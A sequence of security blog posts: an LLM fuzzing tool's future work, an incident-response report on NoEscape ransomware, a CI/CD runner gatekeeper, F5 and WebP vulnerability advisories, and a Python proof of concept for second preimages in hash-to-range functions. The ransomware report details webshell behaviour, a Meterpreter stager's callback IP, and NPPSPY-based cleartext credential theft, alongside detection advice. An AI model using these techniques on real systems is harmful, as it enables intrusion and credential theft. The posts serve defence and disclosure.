Even though the Rust ecosystem guarantees some structure in most projects, that structure can quickly become complex. Fuzzomatic does support quite a bit of Cargo’s features and is capable of handling Cargo workspace projects with multiple workspace member crates for example. However, we haven’t tried to support all Cargo features, such as [build-dependencies], [patch.crates-io] or target-specific dependencies, to name a few, and there are still projects where Fuzzomatic may fail because of this.
External non-Rust dependencies are a problem and are one of the reasons why some projects would not build by default. Automatically installing these would help with automated fuzzing from scratch.
The default branch of a repository may not always be in a building state. Another strategy may be to check out the latest tag or release and target that instead of the latest commit.
Optimizations regarding costs and benefits when using commercial LLMs may be implemented. For example, retrying with a larger model (such as GPT-4) when all other approaches fail. This way, we first try a cost-effective approach, and then use a more expensive one as a last resort. This could be an option to avoid exceeding budgets quickly.
Sometimes, the LLM enters a code fix loop where it suggests the same fix over and over again which doesn’t help in making the fuzz target compile at all. Detecting these cases and failing fast would reduce costs and runtime.
Unit tests sometimes contain test vectors that could be used to automatically generate a seed corpus. So far, we haven’t used a seed corpus at all. Doing so may significantly speed up the discovery of bugs while the fuzzer runs.
Some bugs may not be found because the fuzzer didn’t run for long enough. Currently, Fuzzomatic runs fuzzers for 10 seconds only. An improvement may be to do a 2nd pass on useful fuzz targets and re-run them for a longer time, hoping to find more bugs.
Adding support for more function argument types would help improve Fuzzomatic’s functions approach effectiveness. Support for functions using generic types and more primitive types, for example. Also, being able to generate fuzz targets that instantiate structs and call struct methods would help cover more ground of a code base.
To help as many developers as possible improve the security of their code, it would be even better to support other programming languages, such as C/C++, Java, Python and Go.
We’ve shown that it is possible to generate fuzz targets that successfully build completely from scratch and that do something useful for Cargo-based projects. We’ve even found crashes in code bases completely automatically with this technique.
For security reasons, make sure to always run Fuzzomatic in an isolated environment.
Fuzzomatic is open source and available on Github here. We hope that open-sourcing this tool will help projects find bugs in their own code and improve their overall security posture. We also hope to contribute to automated fuzzing research by sharing what we learned along the way while performing this experiment.
In this installment of Tales from the Incident Response Cliff Face, we’ll take a look at a recent engagement, which involved a string of events that spanned several months.
The focus: ransomware with assisted initial access.

An initial attacker broke into the victim’s environment, established a foothold throughout, and then advertised it for sale on the dark net.
The victim, however, was an NGO that cared for the most vulnerable. For some reason – perhaps the weak financial incentive, perhaps a sense of morals – the access rights to the victim’s environment sat on the marketplace for a full eight months before they were eventually purchased by a second attacker.
In this report, we will elaborate on how the unprepared victim was set up for this ransomware event and, as usual, share some insights to help you avoid being caught in the same trap.
In a nutshell, we will cover:

Our engagement started nearly two weeks after the ransomware detonation. While the client, fortunately, managed to leverage spare backups to perform restoration and avoid business disruption, it did mean that their intervention contaminated the crime scene and that full visibility into the cyber kill chain would be impossible.
Initial triage of forensic collections revealed that the on-premise Exchange server played a central role in the threat actor’s operation by being the source of the RDP internal lateral movement.
To make matters worse, the lack of patching since 2021 coupled with exposure to the internet, would have almost certainly meant that it had already been hit by the Proxysomethingwave.
This hunch was quickly confirmed to be correct. While the usual logs to hunt for this family of Exchange CVEs have only been available since mid-August 2023 and did not show any traces of exploitation, we did manage to find two webshells on disk. I could not determine the previously installed version of Exchange and therefore can’t say with confidence which of these were exploited:
However, working on the assumption that this was a known CVE, it was safe to assume that it must have been one of these.
The two webshells were lightly obfuscated to avoid static disk detection but remained simple (as shown by Figures 1-4, below). They would execute whatever was in the cadataKey request parameter and then either force a 404 or redirect to another page.
My assumption is that this was a way to make it harder for Blue Team operators to identify webshell interactions and reduce the risk of being discovered by their usual technique of using the filter on aspxcoupled with a 200-return code.




The timestamps on these two files indicate that they were created back in December 2022. Furthermore, as shown in Figures 5, I discovered that a file had been created a couple of seconds before the first webshell.
This file masked as the ApacheBench command line utility but proved quickly to be a Meterpreter stager. The Meterpreter stager is built on a template executable, which allows the malicious shellcode to be injected into the .text section.

This stager then communicates to 103.112.232.44:443 to get the rest of the Meterpreter payload. In our investigation, however, it became evident that it was not the only payload to have reached out (see Figure 6). Behind that particular IP, was a compromised Exchange server that was used to compromise other vulnerable Exchange servers.
This is a classic case of launching an attack from another victim – so the hackers can hide their identity.


The forensic analysis revealed that NoEscape managed to perform lateral movement via RDP with the domain admin account. After confirming that the latter was not performed in restricted admin mode, which would require the NT Hash only, the usual question was on the table once again: How did the attacker obtain the clear text password?
A fair guess would be that the attacker got hold of it by exploiting the previously mentioned CVEs that give local system privileges on the Exchange server. If, as was the case here, a decent AV/EDR solution was missing, dumping credentials from the LSASS process would become child’s play and provide easy access to the domain admins credentials, which would likely be cached on the Exchange server.
But a fair guess, in this case, is not a correct guess!
In this case, the LSASS did not contain cleartext credentials since WDigest was not enabled. Furthermore, the NTLM hash would not have been easily cracked either since the customer confirmed he was using complex 18-character passwords. Finally, the password did not appear to be stored in common credential stores nor in simple text or script files.
Suddenly, answering how the attacker achieved this privilege escalation became really interesting. To find answers, we had to go back to the textbooks.
What we know about cleartext passwords is that their lifetime in modern systems is short. A cleartext password only exists when it is being acquired, but as soon the credential needs to be validated (be it locally or remotely), the password is hashed and the cleartext form is basically lost for good. This means that it’s only possible to obtain the cleartext form in a small number of other ways. The most basic involves listening to the interactive logon process. This is what keyloggers do (as their name suggests) by collecting keystrokes. More refined techniques specifically target the Windows interactive logon process. A famously documented technique involves Windows Authentication Providers, which comprise two groups: Security Support Providers and Network Providers. We will focus on the latter in our tale.
If you are curious to know more about Security support providers and the different techniques for stealing cleartext credentials, read more here:
https://www.scip.ch/en/?labs.20220217
The technique to steal cleartext credentials by abusing Network Providers has a 2020 implementation under the name NPPSPY
https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy (I also found descriptions of the technique dating back to the early 2000s)
https://www.giac.org/paper/gcih/117/microsoft-network-provider-exploit/101145
TLDR: A neat visual explains how the technique works. The dll needs to be “recorded” in the registry for it to be called, by declaring a network provider.

The documented steps of the technique would mean that the attacker would have had to make some changes in the registry, so this gave us a lead to test the NPPSPY hypothesis. When we queried the registry for traces of the exploit, we found a new network provider had been introduced (see Figure 7).

As shown in Figure 7, we found from our investigation that the ntoskrnl.dll had been maliciously placed in the system32 folder (Windows does not use ntoskrnl.dll, only ntoskrnl.exe) and a dummy network provider named credman had been created, which pointed to the dll. Interesting to note, the last WriteTime of the registry was on February 28th, 2023.
Given that this technique requires admin privileges that allow a user to make changes in the registry (something the exploitation of the Exchange vulnerabilities can grant) we made the link between the two exploitation events.
In fact, malicious .NET compilation artefacts around the same time as the registry modification led us to believe that the exchange vulnerability may have been exploited multiple times.
The next step was to analyze the malicious dll (ntoskrnl.dll) to determine where it had stored the looted files. Existing threat intelligence on this dll gave us this information (Figure 8).

Most importantly, we can see that it generated the following file “C:\ProgramData\Package Cache\Windows10.0-KB5009543-x64.msu”. A quick inspection of the file’s content in the compromised server revealed the stolen passwords in cleartext:

A lot of what we do on the investigation front is driven by our intuition. Our hunches. We explore these and see if they deliver fruit. So, what was supposed to be a simple confirmation of the NPPSPY technique with some admin users’ passwords sparked my curiosity: There were a lot of accounts in the file, far more than you’d normally expect to see in a usual exchange server (which should be solely admin users). It seemed that every regular domain user had their credentials stored here. The idea that they had all interactively logged onto it would be totally implausible.
Or so we thought…
Going from ‘How was it possible for the attacker to find the cleartext password?’ we moved onto the question ‘Why were so many regular domain user credentials on the Exchange server?’
We suspected that the scope of the technique covered in the documentation could – in certain conditions – be widely extended. The intuitive explanation was that somehow, it must have captured mailbox-related authentications. Looking up NPPSPY in conjunction with Exchange Server I found only one blog post that gave me the information I needed:
This post suggests that using NPPSPY on an Exchange server would swoop all mail-related authentications. Interesting as this may be, the blog post didn’t cover why, how, or under what conditions.
This left me on the hunt for further validation, so I proceeded to reproduce it in my lab against a fresh default installation of Exchange Server 2019.
My approach was to interactively login using different ways (OWA, ECP, Powershell, etc.) and see which login attempts would interact with the loot file, thus suggesting credential theft.
For example, when logging in via OWA, I get the following hit (see Figure 10).


Figure 11 shows that the initiating process was the Microsoft Exchange Outlook WebApp (OWA). Based on what I found, I checked the stack trace (Figure 12).

The stack trace confirmed that OWA authentication went through the Malicious Network Provider and called the NPLogonNotify API for loot.dll.
Interestingly, the stack trace showed also that authbas.dll was involved. As shown in figure 13 below, this proves that this dll was responsible for the IIS BasicAuthenticationModule
As soon as I realized this, the fog cleared and it all became crystal clear.

The authentication process had proceeded by invoking LogonUserExW (see Figure 46.). This literally behaved as if authentication was being made to a local computer, just as we would expect to see from the documentation of NPPSPY with Interactive/Remote Interactive Logons.

After this step,Mpr.dll was then called. By way of reminder, Mpr.dll stands for the Multiple Router Provider that handles communication with the installed network providers. Mpr.dll checks the registry to determine which providers are registered and then goes through them, one by one.
So just as we thought, our malicious network provider was called and our dll was triggered via the exported NPLogonNotify. The credentials were then passed down to it and ended up in the text file as indicated by the call to WriteFile (Figure 11, above). Note that the functionality of NPLogonNotify is arbitrarily set by the attacker. In this case, the attacker deemed it sufficient just to write credentials to a text file, but they could have done something more complex, e.g., send the credentials over the network, which would have removed any trace on the disk.
Thus, we were able to confirm that the threat actor did abuse IIS Basic authentication with the NPPSPY technique to place himself into every Exchange web authentication.
The corresponding event log for this Exchange Web Authentication corroborates our observations about IIS Basic Authentication as the logon attempt is Type 8: network clear text (Figure 15).

The reason I focused on this attack was to explore the new elements it comprised and offer guidance on detection and prevention.
Unfortunately, the dll used in this test is based on the NPPSPY repository but was recompiled to avoid AV/EDR detection with literally no sophistication at all. It did evade endpoint security solutions successfully which says a lot about the power of this technique, even though the threat model is expensive as it requires admin privileges. Note that I am working with the assumption that admin privileges should never give an attacker the ability to roam freely if a proper AV/EDR is in place.
So, if AV/EDRs seem to be blind to it for now, I suggest focusing on the registry changes that enabled this attack. Any attacker will have to announce his network provider along with the DLL. This means that such changes need to be closely monitored. We appreciate that monitoring requires some resource commitment, as shown by the number of registry changes that are made in our customer base, but this is where something like long-tail analysis can weed out false positives. Sysmon and EDRs have telemetry for commands, process execution, and registry changes and can be leveraged for hunting and detections. Windows Event Logs can be leveraged as well but require explicit auditing.
For more information read the following article:
We want to prevent credential collection of users that log into the Exchange Server (or any Windows host), including those of users authenticating via OWA/ECP.
For users of Windows 11, Microsoft has released the 2H22 Security Baseline which includes a new setting “Enable MPR notifications for the system”. As described above, Microsoft recommends setting it to ‘disabled’ to prevent password disclosure to providers (exceptions apply).
This is a sniper fix – useful if you don’t use providers.
If you don’t use Windows 11, one way is to use the recommended Protected Users Group in Active Directory. I tested this against the technique and can confirm that it inhibits the MPR notifications (the mpnotify.exe process is not spawned after login). Unfortunately, I cannot explain the internals of it and can only deduce from what Microsoft says about “Protected Users Group” that cleartext credentials die too early (Figure 16).

There’s no such thing as a silver bullet though. So, keep in mind that there are side effects to adding users to this group.
This recommendation applies to LSASS credential dumping as well since they are no longer cached.
Regarding the credentials stolen from IIS Basic Authentication by using Outlook on the Web. It is enabled by default and is necessary for OWA/ECP to work (Figure 17).

Disclaimer: I am no Exchange administrator
Obviously, I am not an Exchange administrator. But like many incident responders, I can consume Microsoft documentation. So, II tried disabling Basic Authentication and enabling the other types of authentication but this broke functionality. I did not spend time digging into alternative ways to determine if I could make it work or not.
However, the Microsoft recommendation for on-prem non-hybrid environments is to move from Basic Authentication to Modern Authentication with ADFS for Outlook on the Web (OWA/ECP). This would also allow the usage of stronger authentication features like enabling MFA.
If you do this, be sure not to use Basic Auth in ADFS as it would only shift the problem to another server.

Eight months after the first Exchange compromise, we observed interactions with the webshells that were followed by Anydesk installation in unattended access mode so that user approval would not be required (Figure 18).

From the Exchange server, the threat actor then used Nmap/Zenmap to scan the network and powershell, and then to enumerate the shares in the domain using Invoker-ShareFinderThreaded from PowerView.

For more information:
Note that this is not the first threat actor to use such a technique; it has been widely used not only for host discovery but also to discover the location of company data.
The threat actor then checked who was logged into a server before RDPing into it with the domain admin account (remember, he successfully stole the clear text password via the malicious NPPSPY dll and wrote it on disk). Forensic analysis on the hosts where lateral movement was performed shows that the threat actor identified data and inspected some of it manually by opening some files. The restored environment would not show us how data exfiltration was performed exactly but the firewall logs did show significant outgoing traffic towards IPs that belonged to the mega.co domain.
Given the large delay (8 months) between the first evidence of NPPSPY usage and NoEscape active engagement with the target, it is unlikely that the ransomware actors are behind the exploitation attempts cited so far. We believe NoEscape bought access in the form of cleartext passwords and webshell locations from Initial Access Brokers.
If you are curious about the economics, read https://www.kelacyber.com/the-secret-life-of-an-initial-access-broker/

In this Incident Response Cliff Face tale we investigated a ransomware operator that managed to act on a victim’s environment quickly and efficiently, but whose privileged access was facilitated by a much earlier compromise.
Here are some simple things you can do to prevent this chain of events happening in your organization:
Click here to download the full case study, including the 5 recommendations.
At Kudelski Security (KS), we heavily use a self-hosted GitLab instance for all our codebase, such as all our applications, configuring our cloud environments, or our user management.
Using GitLab CI/CD, we run the tests, builds, and deployments to our various environments, as well as manage security devices via their APIs.
However, as KS doesn’t have full control over the GitLab instance as it is managed by a third-party, we face limitations in configuring security controls that align with our specific use-cases.
This led us to the question: how do we safeguard our secure environments while hosting the code and executing it from our GitLab instance?
The solution we came up with involves building a custom runner, known as YouShallNotPass which acts as a gatekeeper. Its primary role is to determine whether GitLab CI/CD jobs should be allowed to run on GitLab runners within our secure network environment.
Schematically, it looks like this:

In this blog post, we will introduce and showcase our open-source implementation, YouShallNotPass, designed to enhance the security of GitLab and GitHub pipelines executions.
In our pursuit of enhancing security for CI/CD pipelines, it is crucial to define a threat model that identifies potential risks and malicious actors.
We defined the following Threat Model:


Our threat model considers two personas: a malicious user with access to the git project, and a malicious admin on the code collaboration platform such as GitLab or GitHub.
The scenarios identified as High-Risk are:
Those risks led us to define the following four security controls that we need to be able to configure with YouShallNotPass:
Our CI/CD job validation solution, known as YouShallNotPass (YSNP), is available as a proof of concept on GitHub. YSNP is designed to enhance the security of CI/CD pipelines and ensure that only pre-approved jobs run in a trusted and controlled environment.
From an architecture perspective, we have the following three key parts:
We consider both the Custom Runner and Vault being in a secure environment as we can put the security controls we want.
A diagram detailing the components can be seen below:

Compared to a job executed by a normal runner, our custom runner adds the validation using YSNP and Vault (3) before executing the job (4) + (5), only if the checks defined on Vault are successfully passed.
It is important to note that Vault, the GitLab runner, and the CI/CD platform (GitLab) operate independently from each other. For instance, the GitLab runner’s configuration is managed directly on the host, with GitLab having no access to its configuration.
Our custom runner is composed of two parts:
A custom executor is simply user-provided scripts that can be executed before, during, or after the job and we will describe them in the next sections.
For GitLab, this is done through the custom executor which uses four scripts, one for each stage: config_exec, prepare_exec, run_exec, cleanup_exec.
Those scripts can be found on our repo here for interested readers, but in short:
Key Insights from GitLab Custom Executor Development:
While our primary CI/CD platform is GitLab, we explored the use of GitHub’s self-hosted runner feature, which, with some adaptation, proved to be functional for our needs. GitHub’s self-hosted runners lack GitLab’s advanced custom executor concept but allow us to run scripts before and after jobs.
The before_script.sh (available here) performs the following tasks:
Note that during job execution on GitHub Actions, the job log is not visible until the job concludes. This presents challenges when the before_script is waiting for user interaction to delete scratch code, as the log does not contain the necessary link for the user.
YSNP is a Golang application that is called by the custom executors defined above to perform the validation against configurations stored on Vault.
The custom executors call YSNP with the appropriate environment variables. Here are some of the most important ones:
For the full list of variables utilized by YSNP, see here.
The high-level algorithm is the following:
YSNP’s ability to validate CI/CD job executions is driven by configuration files stored in Vault. These files define the criteria for job validation, including image and script whitelisting, and which checks are required.
YSNP relies on two essential configuration files stored in Vault:
1. Whitelist configuration: This JSON-based file contains image and script hashes approved for execution within a specific Git repository. It ensures that only validated images and scripts are allowed to run. A sample whitelist configuration might look like this:

2.youshallnotpass_config: This configuration file allows to configure YSNP itself and which checks are required per-job, or globally.

For example, the config file above is simply mentioning that the job called “user_mfa_job” only has one check which is to validate the user executing the job.
By default, YSNP conducts the following validation checks:
More information about the available options for configuring this file can be found in the Project Configuration Options section.
To prevent malicious users from deleting job logs to conceal their activities, we’ve implemented a feature that logs runner activities to a Mattermost channel. This feature operates at the namespace level and is described in more detail here.
Vault is a great tool for a key-value store as it provides features for granular access using Access Control Lists (ACLs) and transparent authentication using OIDC. In addition, it has all the API endpoints required that we call from YSNP.
The three important points to understand are:
Those steps with the appropriate commands are in the README in the GitLab Runner Setup and GitHub Support (Experimental) sections.
To maintain the reliability and functionality of the GitLab custom executor in conjunction with YSNP, we’ve implemented integration tests under testing/scripts. These tests can be used to provide insights into the setup of our Git repository and Vault
The architecture of those docker-compose files available under testing/integration looks like this:

The integrations tests’ directories are composed of two docker-compose files:
The vault-compose.yml: this Docker setup file defines the configuration for HashiCorp Vault. It is accompanied by the script vault-init.sh, which configures Vault with:
The runner-compose.yml Docker file configures the custom runner (named gitlab_runner in the diagram above) containing both the custom executor and the YSNP application.
The custom runner is setup using the git-init.sh script which configures the custom runner. This script does the following:
This setup is required to mimic the git clone as if it came from GitLab when a job would start.
Now we can simply start the custom runner with the exec command which allows to run locally a job directly without requiring to pull it from GitLab.
Note that this exec command was deprecated in this issue due to this command not supporting all the features that a normal runner would need when running a job.
However due to the popularity of this feature, GitLab is now investigating how to run pipelines locally.
For simplicity, we added youshallnotpass_builder_daemon which allows to rebuild the go application without having to relaunch the full docker compose.
In this section, we explore three key use cases that illustrate how YouShallNotPass (YSNP) effectively addresses and mitigates potential threats, safeguarding CI/CD pipelines from unauthorized access and malicious activities:
This scenario simulates a case where a GitLab runner with access to sensitive internal machines is assigned to an entire namespace (group_with_sensitive_repos). This configuration would allow all repositories under the namespace to use the runner for job execution.
However, on Vault, we have only whitelisted a specific repo (repo_name) in that namespace (while the two other entries are the configuration files at the namespace level):

When a malicious user tries to launch a job (e.g., malicious_job) from an unauthorized repository (repo_unauthorized) using the YSNP custom runner, a failure message is triggered, thwarting unauthorized job execution.
We can see the failure message in the screenshot below:

This scenario mimics a user with access to an approved repository and its associated runner, who attempts to maliciously modify the CI/CD configuration. The aim is to redirect environment variables, including secrets, to an attacker-controlled server.

When YSNP will run, it will check if the script above has been pre-approved in its configuration on Vault.
Since this script does not match the hash of the previously allowed script, when the job is run, the job will fail as we can see in the screenshot below.

Where the allowed_script is found in the whitelist configuration of that repo on Vault.
The final use case we want to present is related to a recent CVE that was published for GitLab: CVE-2023-5207 where an authenticated attacker could impersonate another user when launching a pipeline.
This could allow the attacker to launch a job which only specific users should be allowed to.
When the attacker impersonates the user (with the email address [email protected]) to launch a job, they would see this message (up to line 66):

Now, the attacker would also need to be able to login to Vault with the impersonated user.name to be able to delete the scratch code that was generated by YSNP.
If the attacker does not delete the scratch code, after some time, YSNP will make the job fail (lines 67-68).
Vault ACLs need to be configured in such a way that only user.name has access to the path of the secret to delete it.
As we conclude this blog post, we want to reiterate the importance of securing CI/CD pipelines and the significant role that our open-source custom runner solution, YouShallNotPass (YSNP), plays in this endeavor. The following key takeaways encapsulate the essence of our discussion.
CI/CD platforms are known as highly valuable targets by threat actors due to their importance for modern organizations. As we consider the CI/CD platform as a less trusted environment than where the code itself is executed (i.e., the runner and the machines reachable from them), this means that security checks must be applied to protect against unauthorized use.
The security checks are added as YSNP configuration stored on HashiCorp Vault in the trusted environment which is managed independently than the CI/CD platform. Therefore, making it out of reach of a CI/CD platform compromise.
YouShallNotPass allows you to:
All of this before any job execution happens on the runner.
We currently use this solution daily to protect our most sensitive runners and CI/CD jobs.
We welcome any feedback on our GitHub repo and let’s meet at Black Alps 2023 where we will present our solution!
Written by Scott Emerson of the Kudelski Security Threat Detection & Research Team
Researchers at Praetorian have discovered a request smuggling vulnerability that could be leveraged to bypass authentication and achieve remote code execution on F5 BIG-IP appliances. The vulnerability impacts systems where the Traffic Management User Interface (TMUI) is exposed to untrusted networks like the internet. An attacker can exploit how requests are parsed differently between the frontend and backend systems to forge requests, which in this particular context allows for privileged remote code execution. The vulnerability was assigned CVE-2023-46747 and is a close relative of CVE-2022-26377.
F5 BIG-IP appliances running the Apache HTTP Server and Tomcat components are vulnerable if the TMUI is accessible from external networks. By exploiting differences in how requests are handled, an attacker can bypass authentication checks intended to restrict access to administrative interfaces.
Vulnerable BIG-IP Versions
Vulnerable versionsFixes introduced17.1.017.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG16.1.0 – 16.1.416.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG15.1.0 – 15.1.1015.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG14.1.0 – 14.1.514.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG13.1.0 – 13.1.513.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENGFurther details in F5’s advisory
The vulnerability allows an attacker to construct HTTP requests that would be interpreted differently by the frontend and backend systems interacting over the Apache JServ Protocol (AJP). By abusing differences in how headers like Transfer-Encoding are processed, a follow-up request can be smuggled in and handled unexpectedly. This allows authentication bypass and the remote execution of commands with root privileges if left unpatched.
Follow the directions in F5’s advisory and apply the provided hotfix. Additionally, considering the TMUI service’s recent track record with RCE bugs, the CFC echoes F5’s and Praetorian’s recommendations to ensure the TMUI interface isn’t accessible via untrusted external networks or self IP addresses. Please see the advisory linked above for specific instructions.
At the time of writing, vulnerability scan plugins for CVE-2023-46747 have not been released, but are forthcoming. As soon as the plugins are available and vulnerability scans have run, clients with the relevant service will receive cases if applicable.
The CFC will continue to monitor the situation and decide on next steps like a threat hunting campaign if the relevant data are available and actionable.
Google/Heap Buffer Overflow Vulnerability in WebP (CVE-2023-4863)
Written by Michal Nowakowski of the Kudelski Security Threat Detection & Research Team
As a result of research into vulnerabilities discovered on September 7th and compromising Apple iOS version 16.6, allowing the installation of spyware known as Pegasus, Citizen Lab, together with Apple’s Security Engineering and Architecture Team, notified Google of potential exploit discoveries in Google Chrome, assigning a separate CVE-2023-4863 for the indicated vulnerability. On September 11th, Google released a Stable Channel Update for desktop versions of Chrome on Mac, Linux and Windows systems.
Further analysis and investigation unveils, that the impact of the aforementioned exploit not only targets Google Chrome, but is more widespread, and in fact, any application that relies on the libwebp library to handle WebP images is potentially vulnerable to this attack.
On September 27th Google decided to modify the entry of CVE-2023-4863 and expand the scope to multitude of commonly used applications, libraries, frameworks and operating systems that may be affected.
Among significant list of systems affected by this vulnerability (more than 700) which includes widely used software like:
many of them have been already patched. This includes for example:
Applications
Operating Systems
Other Software
This exploitation, when executed correctly, allows a remote attacker to save data outside the boundaries of the heap using a specially crafted lossless WebP file that runs across multiple browsers, operating systems and applications.
WebP is a lossless image format, sometimes known as VP8L, that allows high-quality images to be displayed on Web pages using much smaller file sizes than traditional formats such as PNG and JPEG. On the other hand, libwebp is a library that allows programs to support the WebP file format.
Apple and Citizen Lab, which coincidentally discovered the WebP vulnerability, were actually investigating an exploit found in a framework called Image I/0, which is part of Apple’s operating system, such as iOS, iPadOS watchOS, and macOS, and allows for reading and writing file formats, including WebP files. The whole idea is to overflow the huffman_tables allocation in ReadHuffmanCodes (src/dec/vp8l_dec.c) by moving the huffman_table pointer beyond the pre-calculated kTableSize cache size. In fact, there are several different pre-calculated bucket sizes depending on the number of color cache bits, and kTableSize only takes into account the first 8-bit table lookups, skipping the remaining 8-bit. When BuildHuffmannTable() tries to populate the second-level table, it can write data outside the boundaries.
Attacks against this vulnerability can range from denial of service (DoS) to possible remote code execution (RCE).
The recommendation is to patch all impacted systems to the recommended versions and checking for the presence of affected software
The CFC is reviewing all affected application on our environment to make sure there is no impact or exploitation.
For clients who have subscribed to the vulnerability service you are going to be receiving critical vulnerabilities reports with your next vulnerability scan runs.
We will continue to keep up to date with this vulnerability to provide further updates as they become available.
Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica
https://www.tenable.com/cve/CVE-2023-4863/plugins
Chrome Releases: Stable Channel Update for Desktop (googleblog.com)
This article is a follow-up of the excellent blog post written last year by Pascal Junod. This explains the strange title. The former post was about flaws regarding the lack of domain separation when hashing different type of data. In this new post we explore related flaws we have found in the wild regarding implementations of hash function when the result need to lie in a specific range.
As explained in Pascal Junod post, domain separation is a way to construct different hash function from the same primitive. It allows to avoid collision when the same hash function is used to hash different data types or structured types. For example, if someone wants to hash the array [104, 101, 108, 108, 111] they may encode it as the bytes “68656c6c6f” and pass it to the hash function. The result will collide with the hash of string “hello” or the array [6841708, 27759] which is undesirable for some application. The usage of domain separation should avoid such flaws. This problem is still regularly found in deployed solutions for example we described previously some flaws we have found during audits of io.finnet and Multisig Labs threshold cryptography implementations. More recently, another team built a private share recovery attack called TSSHOCK based on this findings.
In this post we wanted to study the dual problem. What happen if we would like to hash values to a specific range like number less than a value

, to elliptic curve points our even more complex types.
Some modern constructions like Identity-based, Verifiable Delay Function (VDF), e-voting, BLS digital signature or post-quantum McEliece cryptosystem need a primitive to hash a value into a specific set. This function is usually not defined in the research paper but leaves the responsibility to the implementer of choosing it properly. In addition, the construction usually assumed that the hash function has the usual properties of a standard hash function, namely, pre-image, second pre-image and collision resistances; additionally, for some constructions, the hash function should emulate a random oracle and thus outputs uniformly distributed random values.
For example the function SHA3-384 will output values which can be interpreted as integer between 0 and

. For any power of 2, an Extendable Output Functions (XOF) can be used, like SHAKE256 or even cSHAKE to guarantee domain separation. It generates any integer between 0 and

.
For example in Python, if we want to hash a string to a number less than

, we can run:
>>> import hashlib
>>> s = b"Nobody inspects the spammish repetition"
>>> int(hashlib.shake_256(s).hexdigest(2), 16)
17520However, how to hash a value to the interval

with

not being a power of two for example being the BLS12-381 curve order ? Those problems have been well studied in the past and we will explain how some constructions made with secure hash functions can lead to non-secure results and which construction to use to solve this problem.
The naive approach would be to hash the value and take the result modulo

. However, the problem is that we often need values to be uniformly distributed over the whole range. In addition it does not solve the problem of hashing to a more complex set like the group of an elliptic curve points. Doing the modular reduction results in values not uniformly distributed as explained in a previous blog post, some values will be more probable than others. Depending of the size of the bias it may be inadequate to some protocol using a hash function and assuming a random behavior. This is the case for protocols relaying on the Fiat–Shamir transformation. In this transformation, the hash function is assumed to behave as a random oracle.
A method similar to the rejection sampling when generating random value is called the “Hunt-and-peck” or sometimes “Try-and-Increment method”. It consists in hashing a value and if it does not fit to the desired output constraints to hash it again until a satisfying value is found. A naive implementation of such method would be:
s = b"Nobody inspects the spammish repetition"
q = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab
while True:
h = hashlib.sha3_384(s).digest()
h_int = int.from_bytes(h, "big")
if h_int < q:
break
s = h
print(f"hash: {h_int}")We take the input string we hash it with SHA3-384, we transform it into an integer, we compare it with

(the BLS12-381 curve order) and if the value is less we output the hash value. At the end we have a integer within the desired range:
hash: 466802949991240959638695195289112782003214451371371177487434259700090952460729664879919264417968882381626697562991
However this new function is not second pre-image resistant even though SHA3-384 is secure. Indeed, if we print all the intermediate value in the while loop we obtain:
hash: 23137220369973484377265887243569191346100483129771156387135144547456769712871740599682813528628879944752756968974946
hash: 4799338951322221704001266792102607278636860761731048000187844273144216713087340391657809976969889746113658783263501
hash: 31716994179996713780745603112864241593156066107008767210335595746891411579808647586409712124449922745051863682425891
hash: 33057019732402171167317891841094942089241481235768960620203022480520723235635591889485122017075342314445605653261792
hash: 6868136950288026075232263416539860651777920205102832818155068238833644446416649005650016224862851787880832921908269
hash: 22748065012834597045506904998237282232688457796962528509183870223455258079719138292929491465597511441781142510793740
hash: 8487665222831421746205648827090832729990406203108570795821686918493012585585156403884755993275197374472206949316440
hash: 11845129742337035831031550559334918177370659708015594781961786949561029488376363251397691522368459978971541344556850
hash: 16836971551032022124113289508056539700229076909962170679660431507603067422230552915330374164223401170221136111112554
hash: 466802949991240959638695195289112782003214451371371177487434259700090952460729664879919264417968882381626697562991We have generated 9 different values larger than

before getting a good one. It means that all these values result in the same hash result in our new hash function! Thus, we have generated 9 second pre-images of our initial input. This clearly violates the security of the construction.
Some variants of this approach have been used in practice. For example, in the Swiss Post e-voting system, such primitive was used. This e-vote system was tested for a real vote in 3 Swiss cantons the 18th of June 2023. All the specification and source code have been published and the security has been studied since a long time through their bug bounty program.
Here is the algorithm RecursiveHashToZq defined in the cryptographic primitives specification version 1.2.0:

Basically, The algorithm takes the input value v hashes it with the function RecursiveHashOfLength, test if the result value h is less then

and if not, it computes the hash of the value h || v and so on. Here again, we can construct pre-images for the hash function. If the first value of h is bigger than

then the value v and h||v will give the same hash result.
Here is a simple proof-of-concept demonstrating how to obtain a second pre-image:
q = 0x5BF0A8B1457695355FB8AC404E7A79E3B1738B079C5A6D2B53C26C8228C867F799273B9C49367DF2FA5FC6C6C618EBB1ED0364055D88C2F5A7BE3DABABFACAC24867EA3EBE0CDDA10AC6CAAA7BDA35E76AAE26BCFEAF926B309E18E1C1CD16EFC54D13B5E7DFD0E43BE2B1426D5BCE6A6159949E9074F2F5781563056649F6C3A21152976591C7F772D5B56EC1AFE8D03A9E8547BC729BE95CADDBCEC6E57632160F4F91DC14DAE13C05F9C39BEFC5D98068099A50685EC322E5FD39D30B07FF1C9E2465DDE5030787FC763698DF5AE6776BF9785D84400B8B1DE306FA2D07658DE6944D8365DFF510D68470C23F9FB9BC6AB676CA3206B77869E9BDF3380470C368DF93ADCD920EF5B23A4D23EFEFDCB31961F5830DB2395DFC26130A2724E1682619277886F289E9FA88A5C5AE9BA6C9E5C43CE3EA97FEB95D0557393BED3DD0DA578A446C741B578A432F361BD5B43B7F3485AB88909C1579A0D7F4A7BBDE783641DC7FAB3AF84BC83A56CD3C3DE2DCDEA5862C9BE9F6F261D3C9CB20CE6B
v1 = b64decode("q83vASNFZ4k=")
h1 = recursive_hash_zq(q, v1)
